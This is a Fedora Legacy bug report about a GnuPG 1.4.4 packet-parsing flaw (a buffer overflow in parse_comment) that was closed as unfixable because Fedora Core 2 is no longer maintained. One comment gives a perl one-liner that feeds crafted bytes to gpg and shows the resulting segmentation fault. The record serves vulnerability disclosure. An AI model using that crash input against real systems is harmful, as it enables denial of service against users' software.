Bug 201283 - GnuPG 1.4.5 fixes a flaw in the handling of certain packets
Summary: GnuPG 1.4.5 fixes a flaw in the handling of certain packets
Status: CLOSED CANTFIX
Alias: None
Product: Fedora Legacy
Classification: Retired
Component: gnupg   
(Show other bugs)
Version: fc2
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Fedora Legacy Bugs
QA Contact:
URL: http://lists.gnupg.org/pipermail/gnup...
Whiteboard:
Keywords:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2006-08-04 00:37 UTC by Nils Breunese
Modified: 2007-04-18 17:46 UTC (History)
1 user (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2007-04-10 19:12:11 UTC
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

Description Nils Breunese 2006-08-04 00:37:47 UTC
From the release notes of GnuPG 1.4.5: "Fixed 2 more possible memory allocation 
attacks.  They are similar to the problem we fixed with 1.4.4.  This bug can 
easily be be exploted for a DoS; remote code execution is not entirely 
impossible."

Comment 1 Nils Breunese 2006-08-04 00:40:31 UTC
Probably not only FC2 is affected, but I can only choose one specific FC 
version when reporting a bug.

Comment 2 John Dalbec 2006-08-09 18:04:59 UTC
06.30.21 CVE: Not Available
Platform: Cross Platform
Title: GnuPG Parse_Comment Remote Buffer Overflow
Description: GNU Privacy Guard (GnuPG) is an encryption application.
It is affected by a remote buffer overflow issue due to insufficient
sanitization of the "parse_comment()" function in the "parse-packet.c"
source file. GnuPG version 1.4.4 is affected.
Ref:
http://lists.immunitysec.com/pipermail/dailydave/2006-July/003354.html

rhl7.3 is vulnerable:
perl -e 'print "\xfd\xff\xff\xff\xff\xfe"'| gpg --
no-armor
gpg: Warning: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

gpg: Segmentation fault caught ... exiting
Segmentation fault


Comment 3 Matthew Miller 2007-04-10 19:12:11 UTC
Fedora Core 2 is now completely unmaintained. These bugs can't be fixed in that
version. If the issue still persists in current Fedora Core, please reopen.
Thank you, and sorry about this.


Note You need to log in before you can comment on or make changes to this bug.